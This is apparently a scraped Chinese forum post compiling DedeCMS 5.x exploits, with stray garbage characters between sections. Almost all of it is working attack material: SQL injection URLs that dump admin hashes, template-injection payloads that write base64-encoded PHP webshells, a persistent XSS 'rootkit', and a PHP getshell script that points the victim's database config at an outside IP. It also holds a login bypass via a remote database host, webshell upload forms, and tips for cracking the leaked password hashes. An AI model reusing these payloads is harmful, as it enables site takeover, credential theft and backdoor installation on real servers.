dedecms漏洞总结

admin

8 M, }5 D% i; ]' t# w. mDedecms 5.6 rss注入漏洞
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1

6 c. N/ G+ B- S2 a+ A
& z& h5 ?3 A2 l, Y



" c  N3 m6 c+ \! f- h1 ?7 Z

DedeCms v5.6 嵌入恶意代码执行漏洞
注册会员，上传软件：本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
, q0 R4 H. g# p发表后查看或修改即可执行
/ c0 D! X, Q# f. Ya{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
) F% r3 h& l0 J% d生成x.php 密码xiao，直接生成一句话。


) y" w7 c' g6 Q; l, n


' P7 a8 Z% ^- w- d8 S
& L1 E+ o' S2 M9 ]6 b- _: C
9 @8 A- o, l/ |
Dede 5.6 GBK SQL注入漏洞
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
! I" h( s# w4 w& {, `http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
8 c" K, X# X# c- E% v
9 W" M  u- n/ J
9 ^& S1 b% d; H! M) p
+ w6 i$ |# G0 @* o& D: Z4 g

. d4 j! o1 ^5 o7 e) m3 u
! S4 u5 Y' {. r" O! e2 k0 c
" I. _5 V; ?9 A- _5 T
8 P( F+ C5 N( W# a9 EDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
9 n8 u8 @5 H1 a7 \" D( O

. u  r+ g! [+ [$ t& r

  d8 S! p+ G2 e/ |2 |
, {7 t; N5 w- ?  r
DEDECMS 全版本 gotopage变量XSS漏洞
1.复制粘贴下面的URL访问，触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞，需关闭XSS筛选器。
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="

$ T. x5 k- k9 |, @) x6 l
% D) m; |& A6 c$ s* ?& V3 U- ]% |, o/ \2.关闭浏览器，无论怎么访问下面的任意URL，都会触发我们的XSS。
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
# Q# W, Y  U2 p  M; @

8 x# d! K+ N' u, j" K& Xhttp://v57.demo.dedecms.com/dede/login.php

% {' G5 v" m0 U% W6 {, P  O8 J
5 n+ C% v8 k( H1 k+ Xcolor=Red]DeDeCMS(织梦)变量覆盖getshell
#!usr/bin/php -w
<?php
/ S0 k* E: N* g& p. e( t8 X: Aerror_reporting(E_ERROR);
1 i" y1 M* Y7 w; Mset_time_limit(0);
print_r('
0 J# `, D( B" c( I2 HDEDEcms Variable Coverage
Exploit Author: www.heixiaozi.comwww.webvul.com
);
echo "\r\n";
( ~! O, k, ?. D- Nif($argv[2]==null){
5 C& n( h* S( k$ ^  _/ Oprint_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
7 g/ ~7 b4 x1 e  J5 FExample:
php '.$argv[0].' www.site.com 1 old
. D+ C6 C9 l  P" i" G: C$ ]2 m+---------------------------------------------------------------------------+
% s8 B2 M6 j( c4 R- V, o% ^');
exit;
}
& j! R( y: L$ r: g+ x! r$url=$argv[1];
" w2 j8 o# k) V; L5 J2 V7 r4 {: v$aid=$argv[2];
6 m- x9 V7 h. m  n) Z$path=$argv[3];
$exp=Getshell($url,$aid,$path);
if (strpos($exp,"OK")>12){
echo "
+ B, `! J* L( y! rExploit Success \n";
8 N1 L; Q- x# |6 eif($aid==1)echo "
Shell:".$url."/$path/data/cache/fuck.php\n" ;
( ]0 y  `, t$ Z7 B  Y# \
0 j: @% h3 |1 c  H# b- ^
if($aid==2)echo "
0 V% S7 ^- e7 j. h! i' cShell:".$url."/$path/fuck.php\n" ;
2 N% q' G$ ?0 b& w' f. l

if($aid==3)echo "
Shell:".$url."/$path/plus/fuck.php\n";

. X. F7 q! Z/ N* A1 h3 S* d
}else{
  [- P9 X0 ~2 ~2 u% o6 becho "
, C, }* ?: m8 UExploit Failed \n";
}
function Getshell($url,$aid,$path){
$id=$aid;
# D4 g1 d/ i9 B( I3 P/ l$host=$url;
$port="80";
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
$data .= "Host: ".$host."\r\n";
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
1 t; Q# R7 g) J& x$ ~//$data .= "Accept-Encoding: gzip,deflate\r\n";
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
$data .= "Connection: keep-alive\r\n";
& \; f5 P3 o4 o) K* k6 k5 g0 w$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
& C! `% ^, a4 R  e# k; u% X/ E, s$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
# h) h  d* e( l& d$data .= $content."\r\n";
$ock=fsockopen($host,$port);
if (!$ock) {
% W" Q& [' N; ~2 lecho "
% a( ^* J6 l. V& X- ONo response from ".$host."\n";
& M. P# ^9 i& x" @" i}
; R% N; f" c7 @9 O& A, Wfwrite($ock,$data);
# j, o7 D/ k, D" ]; f; o% E1 z4 _while (!feof($ock)) {
$exp=fgets($ock, 1024);
return $exp;
" y: A4 \: k9 J: ?; Y}
}
! p0 B2 F) `( Y! s" Q

?>

& t7 D; W9 U$ S/ H


  d* z) s+ L( `8 k
' R1 k0 ~8 x; v$ `/ J6 f/ H1 U; I9 a


, k' {" q* {3 T
7 \3 S4 S( o$ ^
5 m' T0 C6 V; [: Q  ]% aDedeCms v5.6-5.7 越权访问漏洞(直接进入后台)
& M  W+ A. p8 ahttp://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
; z- x2 K$ ~. m& h

把上面validate=dcug改为当前的验证码，即可直接进入网站后台
/ O# Q) Z: K+ M
* S7 d8 L* _1 n. g, o/ ?+ e
此漏洞的前提是必须得到后台路径才能实现
7 n2 V) H/ w/ d. T
  A/ X$ O4 b8 E6 q

% O9 y  l# Y- Y7 `# P

0 W6 g1 m* a( C, {

! {/ U$ ^9 o( `
8 L! k, C8 E8 O5 n$ o  b6 }0 G: d

0 e7 c) ~+ l  C2 MDedecms织梦 标签远程文件写入漏洞
前题条件，必须准备好自己的dede数据库，然后插入数据： insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');

8 N$ _0 c" z8 ~4 J" g+ v& R( B
再用下面表单提交，shell 就在同目录下 1.php。原理自己研究。。。
( S. U. [/ M. x! b  O4 G7 ^<form action="" method="post" name="QuickSearch" id="QuickSearch">
! ?9 p- J  K  l: X- t<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
% `8 _3 ^8 v: H, k/ _, O! M<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
" s3 i+ N  X* W% `; `4 d<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
3 ~" e/ K, Q4 k2 p  u7 B<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
9 R5 a$ S  n/ L) Y+ f" C; V6 ?<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
* [) P9 G, y  D8 m" r( w7 u9 H<input type="text" value="true" name="nocache" style="width:400">
( M2 M# ]' ]1 m( v, y<input type="submit" value="提交" name="QuickSearchBtn"><br />
& X8 C  j, Q: q</form>
7 _# {  m4 C& F- L& h% Q<script>
function addaction()
/ r0 T* c5 a3 Q2 b{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
$ I" d. b. R2 x( N* E. [' @+ G</script>

! a+ X4 u' N, h5 m! E
: V, q( i; B/ W2 f  |! I; m) y6 i% M
+ a  e* x- c7 A' M* V3 i+ w" J
# W$ O# S2 w2 Z# c1 k" ^  f


& {2 {, L! ^' F* [' @0 m


6 @: b. s; T+ }& h2 v: O- @DedeCms v5.6 嵌入恶意代码执行漏洞
3 x2 L8 ~1 @  S4 ^' _注册会员，上传软件：本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}，发表后查看或修改即可执行
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
( ^6 N5 g/ i+ V4 t5 x/ T$ Z5 ?" B生成x.php 密码：xiao直接生成一句话。密码xiao 大家懂得
! o5 {; B" b) R, u, {6 i0 n6 d: }Dedecms <= V5.6 Final模板执行漏洞
7 |; Z9 G  Q/ P0 b9 Y" a注册一个用户，进入用户管理后台，发表一篇文章，上传一个图片，然后在附件管理里，把图片替换为我们精心构造的模板，比如图片名称是：
uploads/userup/2/12OMX04-15A.jpg

/ X# U. D/ W' s) u
模板内容是（如果限制图片格式，加gif89a）：
) G% e* h, [4 m, [! X. Q- Y{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
7 M1 U2 P+ ^9 T7 n# Q@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
/ X& n5 {3 x6 ?( B! e- E4 ]2 e& s! E@fclose($fp);
, d# b& U+ N8 z2 ]{/dede:name}
2 修改刚刚发表的文章，查看源文件，构造一个表单：
. X" o/ @2 v# y9 {4 b- M; v# l<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
, E$ g% Q7 @0 ?" d  ^6 {1 }<input type="hidden" name="dopost" value="save" />
4 g; K# x' P2 n/ I! t5 o: Z<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
* p# r. U( ?% B  v2 y/ W& B<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />
! E4 O7 ?: F' v0 |* e
2 F. R1 S; @$ I% w4 T* }0 o
<div id="mainCp">
<h3 class="meTitle"><strong>修改文章</strong></h3>

% `; ~  O: {) {- |
/ f" z% @+ q, y0 [<div class="postForm">
<label>标题：</label>
6 f1 C9 ?6 o1 `' r<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>

' s/ j& b, s# E1 z6 j
6 ?5 a8 @% t( l3 A) D+ r) `<label>标签TAG：</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)

2 |( N9 L4 B3 N" W
<label>作者：</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>

8 S1 |' d4 ^1 \3 _1 i- v7 {4 X
" |1 @2 t7 u, @/ P* Y<label>隶属栏目：</label>
/ W6 A3 e9 ^1 `" f( v<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>测试栏目</option>
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)

6 [+ h% v5 v1 R6 Q
, }0 K" M# Y, G<label>我的分类：</label>
<select name='mtypesid' size='1'>
9 e' N7 z7 P% _<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>hahahha</option>
9 ]) m$ q# f) X( k</select>
- N: t# V7 G) ]9 X* x

<label>信息摘要：</label>
<textarea name="description" id="description">1111111</textarea>
(内容的简要说明)


<label>缩略图：</label>
' M0 J8 ~. K2 y, f<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>

* F( s4 s# B8 {$ G
: F6 q! a( |" B) S' W0 g<input type='text' name='templet'
" H$ j) `- e0 T8 ~, D2 pvalue="../ uploads/userup/2/12OMX04-15A.jpg">
7 U. P7 u, k2 s+ q4 o9 x<input type='text' name='dede_addonfields'
value="templet,htmltext;">（这里构造）
( ?  z' n( l. m6 K0 l( n$ }</div>

, A5 ^5 u' ]  B! \9 y. P, k
<!-- 表单操作区域 -->
# ]+ R/ O% N  @" B# t<h3 class="meTitle">详细内容</h3>
0 I/ k/ p9 E  j, `  e' B
' X1 H# y$ s, M% n' m7 \- E+ ^
) s9 |$ r- l1 y0 W9 y5 g<div class="contentShow postForm">
3 I2 u+ |. V# m: j! q7 k4 |<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>

* S, h  S2 `; v. C  H
<label>验证码：</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清？点击更换" align="absmiddle" style="cursor:pointer" />
1 O% _6 |! c- ^, l* y5 y" l0 A
* z: N  D( g! h) g
- t4 r6 h5 |/ E% m<button class="button2" type="submit">提交</button>
<button class="button2 ml10" type="reset">重置</button>
</div>
) D9 M6 R1 }$ `2 F( a" Q9 [
, I; w; j' y2 a3 \+ P
8 e/ q: N1 O- k9 [9 I  S, o</div>


- V3 h& P2 v. v% f. h, l1 |</form>


提交，提示修改成功，则我们已经成功修改模板路径。 3 访问修改的文章：
假设刚刚修改的文章的aid为2，则我们只需要访问：
. H! j" A5 G5 D, C6 ?. x2 |http://127.0.0.1/dede/plus/view.php?aid=2
+ h2 Z- n6 D5 V% c5 h即可以在plus目录下生成webshell：1.php


- B: }) I! q# b5 A2 |- b* T0 y+ \
) T7 y2 K) O' g
9 c" c* O; |( ^3 Y; N% j
$ z9 f& S7 b0 L


4 n; _% B% i& k/ z/ N! m


1 b0 h1 S# \4 O9 j: r7 t( }8 g, z; s9 h
- r& h$ {' F# N2 TDEDECMS网站管理系统Get Shell漏洞(5.3/5.6)
& A0 @0 r4 N4 R9 H, \0 R% \5 JGif89a{dede:field name='toby57' runphp='yes'}
+ |9 D; m9 Z3 k$ ^$ I# e  l. Bphpinfo();
{/dede:field}
保存为1.gif
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" ">
( J3 H. _' ^9 P  I2 x<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
4 ~5 A( J" O3 `6 U0 q2 q) a<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
4 C& G( E9 i5 K: y<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
% V) A; l9 M* o2 C<button class="button2" type="submit" >更改</button>
4 k0 x) K  q$ ~! t9 M# L2 _; h1 M3 u</form>
# B6 R5 h) t2 I! N9 d# w& J

0 s3 }1 v; `+ \2 ~' q构造如上表单，上传后图片保存为/uploads/userup/3/1.gif
发表文章，然后构造修改表单如下：


2 V: Q/ k- l+ G% ~, B2 j<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
% h2 k9 v6 O  `; x<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
9 ]4 L, i) V7 \$ S0 C<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
+ N* P4 p. d9 W. G5 V, `<input type="hidden" name="sortrank" value="1282049150" />
  t4 x- i( X  T5 k( t<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
0 q: ~) n) J& ?<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
<select name='mtypesid' size='1'>
% J; r7 ?/ q, ^0 w<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>aa</option></select>
3 o0 [4 I' @- S- d* k<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
! T  b. `! Y: x1 S7 d8 y<input type='hidden' name='dede_addonfields' value="templet">
) v  t# l% }; L- ~0 S<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
% e2 J8 V0 B% N+ D4 o0 p* z6 ~: j<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
& n+ j" n4 u9 F! n$ c+ a<button class="button2" type="submit">提交</button>
</form>
, G, G$ v! I! q6 V5 y* z0 y
- A5 }  w: K$ c, C' S( b( g
  G8 ^0 M5 t- x3 f! }1 v
4 m. G+ j$ v9 ~1 \

7 M/ [$ R7 J) S& X
3 V5 S* t2 L3 Q, `7 S
; M5 W! ~: I/ U5 ?+ d: z$ U
* w. o2 @% F$ ?! }1 L( K



' ?- I) a0 h* l8 h( b! @9 y; c织梦(Dedecms)V5.6 远程文件删除漏洞
5 z; `/ R$ F% B& A. Uhttp://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
6 r3 Y- e* x+ `! _6 R% u7 m% Q
: W: N& ~2 m  R' r8 P
8 ?6 @( ^2 S4 O$ U  r2 G7 k


" D5 V4 a/ V( o" g7 b* b

% s/ @( b# O, G  g1 d  I! ]+ u$ y
9 Q# T* n# h3 y8 Y# X

& P1 V  D) n8 m8 u# E) I5 z7 b织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞
1 V' R& q4 a, n' _3 T# ~6 Jhttp://www.test.com/plus/carbuya ... urn&code=../../
7 G  N5 e+ b4 \# U/ Y2 {3 l$ @" E
/ u! [, y6 x( o: Z. Y- k, B

' x: C* s$ F2 x3 i  ^  P6 C: T
1 F8 f# J- ?/ X) M$ A! E4 x



1 z4 X7 r4 I; S
, f) D; g. l) [( n
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
! G3 I. E; |; d( K& Y4 uplus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
密码是32位MD5减去头5位，减去尾七位，得到20 MD5密码，方法是，前减3后减1，得到16位MD5

! G0 P$ j* @  [# ^
5 P0 T% o  Z- t8 d2 D  u) R
/ \1 f& Q8 T& N1 c6 n  M' T
/ p6 X3 J/ G* T0 u1 ?3 o! v8 t

. n. M! r3 B7 C! P9 M" _7 X& O
+ x. s+ w# B9 |+ n1 v


织梦(Dedecms) 5.1 feedback_js.php 注入漏洞
4 M- M1 R1 @- P6 y2 A! K3 b/ o* p; Zhttp://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='

6 a% w  Z5 P3 e4 S



) d  m% A$ ]5 O' }# O

% T9 o& b( n8 ?" C
7 X& j$ D1 k/ A% }6 v

) f- @& m9 Q0 h7 _  y" \4 m织梦(Dedecms)select_soft_post.php页面变量未初始漏洞
1 N; g5 p1 c! x* L  v<html>
4 C3 k3 K8 u$ f3 W( C7 H$ q+ O9 m<head>
4 Q; E3 V( J& J# D. U# Q9 E, f<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
2 `$ |: ?" J% y, X6 F5 i<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
& m2 M6 l: Q+ g# k<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
" w; P8 Z5 q" N5 c/ G' }2 d9 F<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='确定' />
</form>
<br />It's just a exp for the bug of Dedecms V55...<br />
/ ]# ]7 B  [7 Y/ Y0 [) l" K' {! }3 [& eNeed register_globals = on...<br />
Fun the game,get a webshell at /data/cache/fly.php...<br />
</body>
1 j4 t6 o6 g: I! h. [</html>

2 k# S: C% g- T: S


- v' O% S2 R. y5 U! Y

2 O- D& r. Y" p/ K4 E: t# e


" p9 H2 b- q2 h; z) r) k* a, X" {
- a2 k$ a! o! E. ^8 Z- i4 F织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞
6 p9 n0 P! D  k. t  W3 m* ?5 l利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。
1. 访问网址：
1 R) u0 Q+ v" Y$ l  Whttp://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
- Y7 l- C6 Y! _& K  T可看见错误信息


2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。
int(3) Error: Illegal double '1024e1024' value found during parsing
$ D4 F. f1 K& ~1 U( n- s" HError sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
  s6 Q9 z' `4 @

3. 执行dede.rar里的文件 test.html，注意 form 中 action 的地址是


+ q; ~9 |: a8 Y4 U  O# X<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>
/ y; j* L/ |( Y" U8 ?1 |! }
0 ~% f4 A5 i, X+ i
, A/ h( n# H9 _& r按确定后的看到第2步骤的信息表示文件木马上传成功.


8 j$ J7 }" ]* |; `

, ~+ H/ A  @$ W7 z1 R  {1 A' O9 H

* t/ Z1 E( M, y' F! I: d  ]
# O. K, _( ]! ~4 P9 T

+ m) z* W0 V  b$ A; ?$ Z# C
9 ?& n. Z: Z! e0 H& [" h$ k

织梦(DedeCms)plus/infosearch.php 文件注入漏洞
7 a( R: K6 b- ^0 r5 D- Fhttp://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*